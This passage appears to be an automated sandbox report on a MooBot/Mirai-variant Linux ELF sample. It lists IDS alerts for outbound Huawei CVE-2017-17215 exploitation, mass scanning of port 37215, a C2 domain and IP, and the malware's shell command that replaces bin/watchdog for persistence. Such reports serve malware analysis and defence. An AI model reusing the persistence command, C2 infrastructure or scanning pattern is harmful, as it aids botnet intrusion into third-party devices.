              192.168.2.23172.87.207.2655956372152835222 03/20/23-18:46:49.166628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595637215192.168.2.23172.87.207.26
              192.168.2.23195.133.40.20236176569992030490 03/20/23-18:45:18.014810TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)3617656999192.168.2.23195.133.40.202
              195.133.40.202192.168.2.2356999361762030489 03/20/23-18:47:20.158707TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699936176195.133.40.202192.168.2.23
              192.168.2.2334.120.62.2545848372152835222 03/20/23-18:46:43.953554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584837215192.168.2.2334.120.62.25
              192.168.2.23147.146.246.20743420372152835222 03/20/23-18:46:40.914230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342037215192.168.2.23147.146.246.207
              192.168.2.2341.44.217.3848448372152835222 03/20/23-18:45:35.250142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844837215192.168.2.2341.44.217.38
              192.168.2.2341.47.127.8953138372152835222 03/20/23-18:45:47.393680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313837215192.168.2.2341.47.127.89
              192.168.2.23197.246.253.7246886372152835222 03/20/23-18:46:09.990245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688637215192.168.2.23197.246.253.72
              192.168.2.2365.121.182.20447404372152835222 03/20/23-18:46:40.895758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740437215192.168.2.2365.121.182.204
              192.168.2.23154.211.39.15455138372152835222 03/20/23-18:46:11.261546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513837215192.168.2.23154.211.39.154

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 20, 2023 18:45:17.234925985 CET42836443192.168.2.2391.189.91.43
              Mar 20, 2023 18:45:17.746838093 CET4251680192.168.2.23109.202.202.202
              Mar 20, 2023 18:45:17.970103025 CET6504437215192.168.2.23157.69.213.161
              Mar 20, 2023 18:45:17.970169067 CET6504437215192.168.2.2354.181.112.161
              Mar 20, 2023 18:45:17.970181942 CET6504437215192.168.2.2341.201.50.243
              Mar 20, 2023 18:45:17.970177889 CET6504437215192.168.2.23197.46.216.52
              Mar 20, 2023 18:45:17.970177889 CET6504437215192.168.2.23157.181.232.137
              Mar 20, 2023 18:45:17.970191002 CET6504437215192.168.2.23157.121.7.109
              Mar 20, 2023 18:45:17.970228910 CET6504437215192.168.2.23157.160.5.161
              Mar 20, 2023 18:45:17.970228910 CET6504437215192.168.2.23197.108.7.32
              Mar 20, 2023 18:45:17.970228910 CET6504437215192.168.2.23157.247.82.49
              Mar 20, 2023 18:45:17.970246077 CET6504437215192.168.2.23157.62.100.69
              Mar 20, 2023 18:45:17.970252991 CET6504437215192.168.2.2341.253.49.219
              Mar 20, 2023 18:45:17.970266104 CET6504437215192.168.2.2341.138.145.46
              Mar 20, 2023 18:45:17.970282078 CET6504437215192.168.2.23157.153.27.61
              Mar 20, 2023 18:45:17.970282078 CET6504437215192.168.2.23157.60.185.218
              Mar 20, 2023 18:45:17.970284939 CET6504437215192.168.2.23197.25.151.92
              Mar 20, 2023 18:45:17.970282078 CET6504437215192.168.2.23157.50.115.70
              Mar 20, 2023 18:45:17.970309019 CET6504437215192.168.2.2341.119.64.157
              Mar 20, 2023 18:45:17.970309019 CET6504437215192.168.2.23197.93.178.172
              Mar 20, 2023 18:45:17.970314980 CET6504437215192.168.2.23216.156.238.190
              Mar 20, 2023 18:45:17.970315933 CET6504437215192.168.2.2341.22.72.94
              Mar 20, 2023 18:45:17.970356941 CET6504437215192.168.2.2334.139.69.212
              Mar 20, 2023 18:45:17.970360041 CET6504437215192.168.2.2341.195.197.253
              Mar 20, 2023 18:45:17.970360041 CET6504437215192.168.2.23157.254.83.178
              Mar 20, 2023 18:45:17.970360041 CET6504437215192.168.2.2341.41.105.186
              Mar 20, 2023 18:45:17.970360041 CET6504437215192.168.2.23157.48.0.216
              Mar 20, 2023 18:45:17.970375061 CET6504437215192.168.2.23197.111.249.62
              Mar 20, 2023 18:45:17.970386028 CET6504437215192.168.2.23131.169.35.127
              Mar 20, 2023 18:45:17.970412016 CET6504437215192.168.2.23157.168.121.177
              Mar 20, 2023 18:45:17.970423937 CET6504437215192.168.2.23217.92.220.21
              Mar 20, 2023 18:45:17.970433950 CET6504437215192.168.2.23197.3.31.105
              Mar 20, 2023 18:45:17.970444918 CET6504437215192.168.2.23190.211.76.230
              Mar 20, 2023 18:45:17.970458984 CET6504437215192.168.2.23157.66.89.253
              Mar 20, 2023 18:45:17.970488071 CET6504437215192.168.2.2341.251.233.54
              Mar 20, 2023 18:45:17.970491886 CET6504437215192.168.2.2341.21.179.143
              Mar 20, 2023 18:45:17.970526934 CET6504437215192.168.2.23168.152.147.127
              Mar 20, 2023 18:45:17.970531940 CET6504437215192.168.2.23157.184.179.188
              Mar 20, 2023 18:45:17.970531940 CET6504437215192.168.2.23157.172.95.48
              Mar 20, 2023 18:45:17.970535994 CET6504437215192.168.2.2341.186.24.153
              Mar 20, 2023 18:45:17.970551968 CET6504437215192.168.2.23157.4.239.11
              Mar 20, 2023 18:45:17.970561028 CET6504437215192.168.2.23166.21.183.195
              Mar 20, 2023 18:45:17.970592022 CET6504437215192.168.2.23157.172.226.221
              Mar 20, 2023 18:45:17.970603943 CET6504437215192.168.2.23157.240.136.76
              Mar 20, 2023 18:45:17.970617056 CET6504437215192.168.2.2398.118.100.238
              Mar 20, 2023 18:45:17.970619917 CET6504437215192.168.2.2341.52.39.198
              Mar 20, 2023 18:45:17.970628023 CET6504437215192.168.2.2341.86.147.69
              Mar 20, 2023 18:45:17.970632076 CET6504437215192.168.2.2341.172.201.183
              Mar 20, 2023 18:45:17.970640898 CET6504437215192.168.2.23158.179.115.74
              Mar 20, 2023 18:45:17.970643044 CET6504437215192.168.2.2395.216.203.108
              Mar 20, 2023 18:45:17.970657110 CET6504437215192.168.2.2341.159.240.246
              Mar 20, 2023 18:45:17.970668077 CET6504437215192.168.2.23197.49.212.44
              Mar 20, 2023 18:45:17.970674038 CET6504437215192.168.2.23197.79.7.157
              Mar 20, 2023 18:45:17.970721006 CET6504437215192.168.2.2341.218.211.179
              Mar 20, 2023 18:45:17.970721960 CET6504437215192.168.2.2313.162.121.122
              Mar 20, 2023 18:45:17.970724106 CET6504437215192.168.2.23157.220.121.132
              Mar 20, 2023 18:45:17.970727921 CET6504437215192.168.2.2341.153.147.61
              Mar 20, 2023 18:45:17.970762014 CET6504437215192.168.2.23197.254.19.135
              Mar 20, 2023 18:45:17.970768929 CET6504437215192.168.2.23113.126.214.1
              Mar 20, 2023 18:45:17.970771074 CET6504437215192.168.2.234.125.192.245
              Mar 20, 2023 18:45:17.970771074 CET6504437215192.168.2.23157.180.62.57
              Mar 20, 2023 18:45:17.970803022 CET6504437215192.168.2.23197.146.131.144
              Mar 20, 2023 18:45:17.970803976 CET6504437215192.168.2.2349.226.243.84
              Mar 20, 2023 18:45:17.970824957 CET6504437215192.168.2.2341.113.37.49
              Mar 20, 2023 18:45:17.970840931 CET6504437215192.168.2.23157.225.99.95
              Mar 20, 2023 18:45:17.970849991 CET6504437215192.168.2.23197.210.217.94
              Mar 20, 2023 18:45:17.970870972 CET6504437215192.168.2.23197.190.232.33
              Mar 20, 2023 18:45:17.970880032 CET6504437215192.168.2.23221.109.213.204
              Mar 20, 2023 18:45:17.970880032 CET6504437215192.168.2.2341.148.180.126
              Mar 20, 2023 18:45:17.970880032 CET6504437215192.168.2.23197.42.15.73
              Mar 20, 2023 18:45:17.970904112 CET6504437215192.168.2.2341.184.195.233
              Mar 20, 2023 18:45:17.970913887 CET6504437215192.168.2.2341.116.235.89
              Mar 20, 2023 18:45:17.970927000 CET6504437215192.168.2.23128.13.38.238
              Mar 20, 2023 18:45:17.970927000 CET6504437215192.168.2.23181.155.69.248
              Mar 20, 2023 18:45:17.970927000 CET6504437215192.168.2.23197.237.101.214
              Mar 20, 2023 18:45:17.970947981 CET6504437215192.168.2.2341.189.111.175
              Mar 20, 2023 18:45:17.970949888 CET6504437215192.168.2.23197.106.31.63
              Mar 20, 2023 18:45:17.970961094 CET6504437215192.168.2.23213.252.185.121
              Mar 20, 2023 18:45:17.970974922 CET6504437215192.168.2.2341.250.160.111
              Mar 20, 2023 18:45:17.970985889 CET6504437215192.168.2.2341.94.173.1
              Mar 20, 2023 18:45:17.970994949 CET6504437215192.168.2.23193.146.21.237
              Mar 20, 2023 18:45:17.971016884 CET6504437215192.168.2.2341.197.55.216
              Mar 20, 2023 18:45:17.971016884 CET6504437215192.168.2.23157.72.4.217
              Mar 20, 2023 18:45:17.971035004 CET6504437215192.168.2.2399.23.178.232
              Mar 20, 2023 18:45:17.971045971 CET6504437215192.168.2.23220.180.122.243
              Mar 20, 2023 18:45:17.971050024 CET6504437215192.168.2.2341.99.120.219
              Mar 20, 2023 18:45:17.971066952 CET6504437215192.168.2.2361.247.226.167
              Mar 20, 2023 18:45:17.971067905 CET6504437215192.168.2.2338.119.240.0
              Mar 20, 2023 18:45:17.971105099 CET6504437215192.168.2.23197.218.45.58
              Mar 20, 2023 18:45:17.971107006 CET6504437215192.168.2.2354.100.71.216
              Mar 20, 2023 18:45:17.971107006 CET6504437215192.168.2.23197.136.208.116
              Mar 20, 2023 18:45:17.971131086 CET6504437215192.168.2.23157.100.146.122
              Mar 20, 2023 18:45:17.971143961 CET6504437215192.168.2.23197.188.240.43
              Mar 20, 2023 18:45:17.971153021 CET6504437215192.168.2.23197.13.198.16
              Mar 20, 2023 18:45:17.971162081 CET6504437215192.168.2.23197.61.71.180
              Mar 20, 2023 18:45:17.971189022 CET6504437215192.168.2.23157.29.147.76
              Mar 20, 2023 18:45:17.971189022 CET6504437215192.168.2.23217.130.144.80
              Mar 20, 2023 18:45:17.971206903 CET6504437215192.168.2.23157.75.8.239
              Mar 20, 2023 18:45:17.971214056 CET6504437215192.168.2.23197.32.146.176
              Mar 20, 2023 18:45:17.971215963 CET6504437215192.168.2.2341.164.175.27

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 20, 2023 18:45:17.965209961 CET192.168.2.238.8.8.80x9e33Standard query (0)test.zxyes.xyzA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 20, 2023 18:45:17.987369061 CET8.8.8.8192.168.2.230x9e33No error (0)test.zxyes.xyz195.133.40.202A (IP address)IN (0x0001)false

              System Behavior

              General

              Start time:18:45:16
              Start date:20/03/2023
              Path:/tmp/x86_64.elf
              Arguments:/tmp/x86_64.elf
              File size:63296 bytes
              MD5 hash:31bc5e9f752e5b6bbd24544e54142086

              General

              Start time:18:45:16
              Start date:20/03/2023
              Path:/tmp/x86_64.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:31bc5e9f752e5b6bbd24544e54142086

              General

              Start time:18:45:16
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:sh -c "rm -rf bin/watchdog && mkdir bin@\\x9e~l\\xfc; >bin/watchdog && mv /tmp/x86_64.elf bin/watchdog; chmod 777 bin/watchdog"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:18:45:16
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:18:45:16
              Start date:20/03/2023
              Path:/usr/bin/rm
              Arguments:rm -rf bin/watchdog
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/usr/bin/mkdir
              Arguments:mkdir bin@\\x9e~l\\xfc
              File size:88408 bytes
              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/usr/bin/chmod
              Arguments:chmod 777 bin/watchdog
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/tmp/x86_64.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:31bc5e9f752e5b6bbd24544e54142086

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/tmp/x86_64.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:31bc5e9f752e5b6bbd24544e54142086

              General

              Start time:18:45:17
              Start date:20/03/2023
              Path:/tmp/x86_64.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:31bc5e9f752e5b6bbd24544e54142086